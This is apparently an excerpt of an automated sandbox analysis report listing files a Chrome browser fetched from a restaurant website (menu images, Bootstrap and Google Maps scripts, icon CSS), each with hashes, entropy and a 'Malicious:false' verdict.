                                                                                                                                                    Preview:......Exif..MM.*...............@...........,...........................................................................(...........1.....".....2.......................i.............T.......-....'..-....'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:13:59.............0221....................0100..................................K.........................................................(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................C...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..`-h...<Ax._.{Ul.V.K ...d...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 440x560, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):80908
                                                                                                                                                    Entropy (8bit):7.88669323421921
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:C2s6lfo2s6lfiOmNTaGMhlHNmYTMYlCczoVmI7JJp+VcPfL/DBwJIVw7Ot:MxPNuRlHLMYlFonJj+Vcb/DaKVVt
                                                                                                                                                    MD5:422E05A6EF4C914EE70087BFD4A8500A
                                                                                                                                                    SHA1:9601C262702C5A5F2EAB0058CD60F91B84B64A5F
                                                                                                                                                    SHA-256:5B849F9C2A010951DAD5E327752D12F67C4C497027897DEE43B81F6788F673E9
                                                                                                                                                    SHA-512:2F492E24F41F5EC79418FEB83146DA1FABEEB3D5BE33B9751A11C9A271F51370787C43BFBD066214A21A7891DD27872F315BCBBFAD743A56035F8874148F0215
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/special-menu-2.jpg
                                                                                                                                                    Preview:....&QExif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 18:17:24.............0221...................................0...............................r...........z.(................................$........H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................~.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.."...X_$I...&6...w.....D8.,.T...p.}.>...?y[oM-#.?..._r.yQ...l..f......=.}
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 1920 x 456, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):147378
                                                                                                                                                    Entropy (8bit):7.924169770810001
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:Cc1YND1foHquMJe/0OVBbbdf4IxfndmnrI7zRO:CjyweRV9dQI1dmnwzRO
                                                                                                                                                    MD5:39D86CC57691F95BA5B1BE4BA9C5C943
                                                                                                                                                    SHA1:F49A6B6562F1ABDEA8DEE31F2D2E2E4F60DDCB5E
                                                                                                                                                    SHA-256:9BA4BE94A0BED00293D0B71C1CD156368FE65080BA5D67D35C5F98DD3FD128F8
                                                                                                                                                    SHA-512:03F20F9C10946224F52DBFBD3D64DB9737396C57AE8E2ACC217517F4ADFCC2010C0F314382E3EE31ABA93BFE39D6BD8CB09083932D73027A20678C1BAAB8660C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR............. .`.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2014 (Windows)" xmpMM:InstanceID="xmp.iid:12B5F284FF4211E6947497ED1D14837D" xmpMM:DocumentID="xmp.did:12B5F285FF4211E6947497ED1D14837D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:12B5F282FF4211E6947497ED1D14837D" stRef:documentID="xmp.did:12B5F283FF4211E6947497ED1D14837D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..W...<"IDATx...#..gj.O.""3.y.{.....W....)}....%.6.|$n.>......m......3.....E.....n...-.7....?.u.I.#I..]..8...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4838
                                                                                                                                                    Entropy (8bit):4.78235472677224
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:wxAxkbjWRlUqkONOTHY8XQQpzkyn6h2fOFS05XlTX8/6C:wmxkbja6qkOATH8UQy6hB15h8X
                                                                                                                                                    MD5:252D27257A5B7ED1BCE8FD797EA20A3C
                                                                                                                                                    SHA1:8886023D432A56C0CF15BB0D40F4F81CEA09B8BF
                                                                                                                                                    SHA-256:1EE8AC8EFF7B2C225D85963EE6160F0071297A3FDAF1532688C4FE01CFC0FB94
                                                                                                                                                    SHA-512:22E4BE9B39F9E59A2D11E50DC3AEADF665A3AF5E6891FAB722D2C2BB102B77939B197307A0F7C1CCF03B774625754CE6C79F4E179728B7E07D3F84B8AB89C954
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:/* ========================================================================. * Bootstrap: affix.js v3.3.6. * http://getbootstrap.com/javascript/#affix. * ========================================================================. * Copyright 2011-2015 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). * ======================================================================== */...+function ($) {. 'use strict';.. // AFFIX CLASS DEFINITION. // ======================.. var Affix = function (element, options) {. this.options = $.extend({}, Affix.DEFAULTS, options).. this.$target = $(this.options.target). .on('scroll.bs.affix.data-api', $.proxy(this.checkPosition, this)). .on('click.bs.affix.data-api', $.proxy(this.checkPositionWithEventLoop, this)).. this.$element = $(element). this.affixed = null. this.unpin = null. this.pinnedOffset = null.. this.checkPosition(). }.. Affix.VERSION = '3.3.6'..
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 55 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):17617
                                                                                                                                                    Entropy (8bit):2.9332741332067678
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:gSdb8kEWmfaSxNX7sc5roxe5h7jw56PEnE/ljO3M:gSKk6CQqwX7jwvE9q8
                                                                                                                                                    MD5:33136EBB2D613ACC9B3C38A577ADA93E
                                                                                                                                                    SHA1:7C654E799D7180560356C18F61CDBFC759F929AF
                                                                                                                                                    SHA-256:6329769EE71E1425816FCB9DECF54D130CB8F0728EE501623C521C2470A2D826
                                                                                                                                                    SHA-512:F1395036BD9D9BAF60BC0F8AB76BD222B52E6BF064F5CA0A880CCEA30AC473D54882ADF9DC29F5612D0D3658AEB646A9E032EB82AB0C4602B53863F6064653B1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/food_menu_boqt.png
                                                                                                                                                    Preview:.PNG........IHDR...7...@........?....pHYs...............;jiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2022-07-17T17:42:20+05:30</xmp:CreateDate>. <
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):73690
                                                                                                                                                    Entropy (8bit):7.234803756768176
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:XYRut0mTUsdxBi/aaeLxyVBFbpqGxkDE2J76u38IGnf:limIsjca+BF8ikDE2p6q8X
                                                                                                                                                    MD5:D82C4DB1A08878F5ED0BBE7822DC6BF5
                                                                                                                                                    SHA1:3F2D40DB5C942E85B9AB709788906D356DB5FB73
                                                                                                                                                    SHA-256:3C8ED041C9F48B2A4EE8BB4C0E7EDCD40CA93E9BB00140D42DF25D4B702248B1
                                                                                                                                                    SHA-512:C4D556BFE384FA3315316E2F145416BB4E210A42CE01B3B3EE2D72DDDADF1D80959BB08DE1B84044361C38B365C11121473F39360EF0C5F8369466E938BA5C75
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/cook_dessert.png
                                                                                                                                                    Preview:.PNG........IHDR.............=..2....pHYs...............?ciTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpMM:DocumentID>adobe:docid:photoshop:1c5c4c66-0cfd-11ed-86e7-ddf6a1902901</xmpMM:DocumentID>. <xmpMM:InstanceID>xmp.iid:00f813a9-2023-bf
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (4599)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):242785
                                                                                                                                                    Entropy (8bit):5.694550757163063
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:tYjmEMff7T2m2xbBx+Q7k9/u+3WZLo9pFZt9:tAmdwxvz7ko4WZLo9pLH
                                                                                                                                                    MD5:9C7F2BF38E74C943D9D73E38B1042544
                                                                                                                                                    SHA1:432C5C2CB5A5B58C35114BFBBEAE3C701BC3AC16
                                                                                                                                                    SHA-256:E3BAB8703D23B4A6342BB78CE8E9025EA8673C1C22C26A29BFFFF4A5184CC521
                                                                                                                                                    SHA-512:371841087F95881EE45F51E09D5599659C8265F0A8A7731DB8FC429CA793B59141077C038CD0904AAD91B85268EE6FDCEC3B98700A11FA986236843E6C6FBD7B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:(function() {'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function ea(a){return function(){return this[a]}}function fa(a){return function(){return a}}var m;function ha(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ia=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ja(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var la=ja(this);function p(a,b){if(b)a:{var c=la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ia(c,a,{configurable:!0,writable:!0,value:b})}}.p("Symbol",function(a){function b(f){if(this instanceo
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 127 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):41872
                                                                                                                                                    Entropy (8bit):6.177885764015635
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:L50wwdDiZkB5gNlU52e/ZBVTwbJjvKDvB9omr2YyuYHiuUn+JTqWl4:d2dDiZZNlU52gB6NSD59oAYHiuYHWl4
                                                                                                                                                    MD5:ACBDB48E62F9567EE6AA445E691687B4
                                                                                                                                                    SHA1:E38A65B6EDB03E661D91C8C9D8E40C3264AD83FB
                                                                                                                                                    SHA-256:8B3E2A73F7BF6F2DCB7E7A4B16692792C7550EAA9C38FA7B2A8D1A84CECB100C
                                                                                                                                                    SHA-512:E2422F4234326594DA1DDF305B28DB4165C49EAC0594210BFD71C4A4EAF9A860CA609E32EFA78FA1C8380E3A294DB61624EC2F2A915BFED4FE092710B2A4946D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Chapli_Kabab.png
                                                                                                                                                    Preview:.PNG........IHDR.......K.....YVX.....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):210528
                                                                                                                                                    Entropy (8bit):7.962338833142009
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:ScylItQq6H/544/EYKt3HI8RI7TWvCpYcCYBXiBSpbNGpLdMBPkEHeUNXn4:SczqK4MYoZRI7K2YcXBXfbK8kE+U5n4
                                                                                                                                                    MD5:1CDB0B52F0B72558B22AEF5B60B054A5
                                                                                                                                                    SHA1:396757851DBF3929B77FFA049F7073919F4A7211
                                                                                                                                                    SHA-256:58DF087623D26C8A2E9916C132FD2B0F8777C7A939B92C47AEC0AC631FB15F69
                                                                                                                                                    SHA-512:79EA275AA7253DA51CCDF38A95D16D236E666F39D2354DCE5668DEEBFBBF7D02C3C3C232E7025C88D33A5082C7EA65C3473692009AC9EF38ABE26F9DA3B7DC74
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-10.jpg
                                                                                                                                                    Preview:....1.Exif..MM.*...............@...........,...........................................................................(...........1.....".....2.......................i.............T............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:26:32.............0221....................0100.............................................................................................(................................0........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..c^H.o.Sk.......'h.`.....
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=700, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 1600x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):165416
                                                                                                                                                    Entropy (8bit):7.947500596841372
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:Z6rz+x5oIqDDojPt2YDUNujl7rj0wvmGHulNBjvNB:OlIqDDojPt2OU09j0wuGiP
                                                                                                                                                    MD5:D72C8F3C3B289AAD39B1191E4D196573
                                                                                                                                                    SHA1:25B987690044881254A25C52EC87EBE3834C1E4B
                                                                                                                                                    SHA-256:47A3A76207E6244D3BC4A1B30F8B2F895DD47F9176C3340826CE56C9CF5EB363
                                                                                                                                                    SHA-512:07057700A9DA7AAC1CD2A2CD50D3A294A2888708D9DA2E10E896584397E9B6DBEAAFA733C6DDE9EEEDAD095AEF1C219A50565F9778044AD3A477F1ABF4A71EB5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/Banner_aboutUs_image.jpg
                                                                                                                                                    Preview:......Exif..MM.*...............@.......................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 16:53:48.............0221.......................@...........................................r...........z.(.................................[.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................F...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......-.h..U.s.~.l.+...N....]F.;..(.......:..-..=..b.Y._...46Zm.#..7..:..
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (724)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3487
                                                                                                                                                    Entropy (8bit):5.373569985049004
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:rPxgYZpBnecBii6nz1hAf3UUvz6+Ze1WP1dX5n:TxgYZGy6zTOXL6Cekv5
                                                                                                                                                    MD5:5A9ABF02F5823F5A50F6B022A9FEDC3E
                                                                                                                                                    SHA1:C1C9B68A1943FBF6E41FB8A848069102337B5ABF
                                                                                                                                                    SHA-256:37F2F9F0E0D75497FE736BD0022FAFA40EEC0E9575A0E50128C8FA2DCFE01A63
                                                                                                                                                    SHA-512:63C0CB51BB815B52BF199BF1F7A77FA3B818B8CE89545314670E8B394CD322A73270F1FD53F4DC7EAA0E4C1B06BF21936CE6768270530B6C116978B80A964A89
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:google.maps.__gjsload__('overlay', function(_){var Oya=function(){},EC=function(a){a.uA=a.uA||new Oya;return a.uA},Pya=function(a){this.Eg=new _.om(()=>{const b=a.uA;if(a.getPanes()){if(a.getProjection()){if(!b.Hg&&a.onAdd)a.onAdd();b.Hg=!0;a.draw()}}else{if(b.Hg)if(a.onRemove)a.onRemove();else a.remove();b.Hg=!1}},0)},Rya=function(a,b){const c=EC(a);let d=c.Fg;d||(d=c.Fg=new Pya(a));_.rb(c.Eg||[],_.dk);var e=c.Ig=c.Ig||new _.xsa;const f=b.__gm;e.bindTo("zoom",f);e.bindTo("offset",f);e.bindTo("center",f,"projectionCenterQ");e.bindTo("projection",.b);e.bindTo("projectionTopLeft",f);e=c.Kg=c.Kg||new Qya(e);e.bindTo("zoom",f);e.bindTo("offset",f);e.bindTo("projection",b);e.bindTo("projectionTopLeft",f);a.bindTo("projection",e,"outProjection");a.bindTo("panes",f);e=()=>_.pm(d.Eg);c.Eg=[_.bk(a,"panes_changed",e),_.bk(f,"zoom_changed",e),_.bk(f,"offset_changed",e),_.bk(b,"projection_changed",e),_.bk(f,"projectioncenterq_changed",e)];_.pm(d.Eg);b instanceof _.Gk?(_.Vk(b,"Ox"),_.K(b,148440)):b
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 113 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):39813
                                                                                                                                                    Entropy (8bit):6.0694772837031215
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:bzdDiHYU5NigckBaO7Kj2kPkCCKJsaOSJLoIsO:1EigcY2jLPD9lu9O
                                                                                                                                                    MD5:20CC5B886607398A0B908074BD6499DC
                                                                                                                                                    SHA1:0013C5DC568719740EE9AC64BDD4C5AA550819BE
                                                                                                                                                    SHA-256:A5DEC3C0103DA8FFAD9DC87467EC6FC9851AB2F097067119B399E1AF75B33AA3
                                                                                                                                                    SHA-512:EEBEAEDC7498442BC66D2B8E74A3FB7CD30546176B6C14CFB366443F7229A52FB559AE11075E07877D6B8A394688996D741CD5431D7604D2E87F25DB6AF337EC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Chicken_Karae.png
                                                                                                                                                    Preview:.PNG........IHDR...q...K.....G.h.....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 90 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):37135
                                                                                                                                                    Entropy (8bit):5.855502032880323
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:f50wRdDiTkZ55U5L/if6cXacdU6KW4QkI/VbbR4J5gidI:hDdDiTWU5LafzXaP6f4nIdp4/gidI
                                                                                                                                                    MD5:ADDC8AADDDB37CB5CF3CE893B3876AF3
                                                                                                                                                    SHA1:65EBB7FC2C3D00124C62780E3E3047D19A961D9C
                                                                                                                                                    SHA-256:4E6BCC3BDCD13B3FE53078EDB9BB54E17971F23BA59BEF9103399129BF9A93E5
                                                                                                                                                    SHA-512:941E6E021851B6A0B5F7A9A2FCC6C58786439BAD5F40DADA1ACEC309A042D10F6FB8587A2763C00A12B149C3B7C8D5694DAC83FAA23649A28A5499896399AF3B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...Z...K......".<....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):16450
                                                                                                                                                    Entropy (8bit):4.8179830304863
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:hsl5yC7huMqJ5UmejPz35E3r4F5cvOAtH:YysEDy+3HvJ
                                                                                                                                                    MD5:237605BBBB7ED1B7C2AFF752FFF078B0
                                                                                                                                                    SHA1:477CBF835966C9E63D06865136ED01FBEEED2BD9
                                                                                                                                                    SHA-256:FBF005E2032E2B5550A3D06190EE8DAC7E5D9ED4E91513B507D15DC99319D345
                                                                                                                                                    SHA-512:279BBDAB1321FA5A7B061B1E631EC6DA77CD000DA0061342BEA321C59BCF49CEB42EA60E6ED32AA74B05C8BD1375A713C17EF019709FD49FDF347F3459A11B7D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/vendors/themify-icons/css/themify-icons.css
                                                                                                                                                    Preview:@font-face {..font-family: 'themify';..src:url("../fonts/themify.eot?-fvbane");..src:url("../fonts/themify.eot?#iefix-fvbane") format("embedded-opentype"),...url("../fonts/themify.woff?-fvbane") format("woff"),...url("../fonts/themify.ttf?-fvbane") format("truetype"),...url("../fonts/themify.svg?-fvbane#themify") format("svg");..font-weight: normal;..font-style: normal;.}..[class^="ti-"], [class*=" ti-"] {..font-family: 'themify';..speak: none;..font-style: normal;..font-weight: normal;..font-variant: normal;..text-transform: none;..line-height: 1;.../* Better Font Rendering =========== */..-webkit-font-smoothing: antialiased;..-moz-osx-font-smoothing: grayscale;.}...ti-wand:before {..content: "\e600";.}..ti-volume:before {..content: "\e601";.}..ti-user:before {..content: "\e602";.}..ti-unlock:before {..content: "\e603";.}..ti-unlink:before {..content: "\e604";.}..ti-trash:before {..content: "\e605";.}..ti-thought:before {..content: "\e606";.}..ti-target:before {..content: "\e607";.}..
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (1981)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):119983
                                                                                                                                                    Entropy (8bit):5.122120793634704
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:9+VDcsC217CXTG6jpiMQosh/8prUsX59OTq/WtVftNDgqmds:9F017+bnTtsuENOC
                                                                                                                                                    MD5:95A83BD26FA971C03E21595B8B8FC1CB
                                                                                                                                                    SHA1:59BDECEA61A694904535546461663AA1928F8671
                                                                                                                                                    SHA-256:0C8DE1E26082EE283CC3FE94065366F8699200E79780DB9FF009BD9846964695
                                                                                                                                                    SHA-512:C422105F57BD14437E6FDE65174013CD13D6984903BFF096C0E49BA95EF53517D67C41D23C6E7D247547999DDF419A650A1D2116EF66BC78B125F15C31BFD1AC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://fonts.googleapis.com/css2?family=Dancing+Script:wght@500;600;700&family=Edu+TAS+Beginner&family=Mochiy+Pop+One&family=Pacifico&display=swap
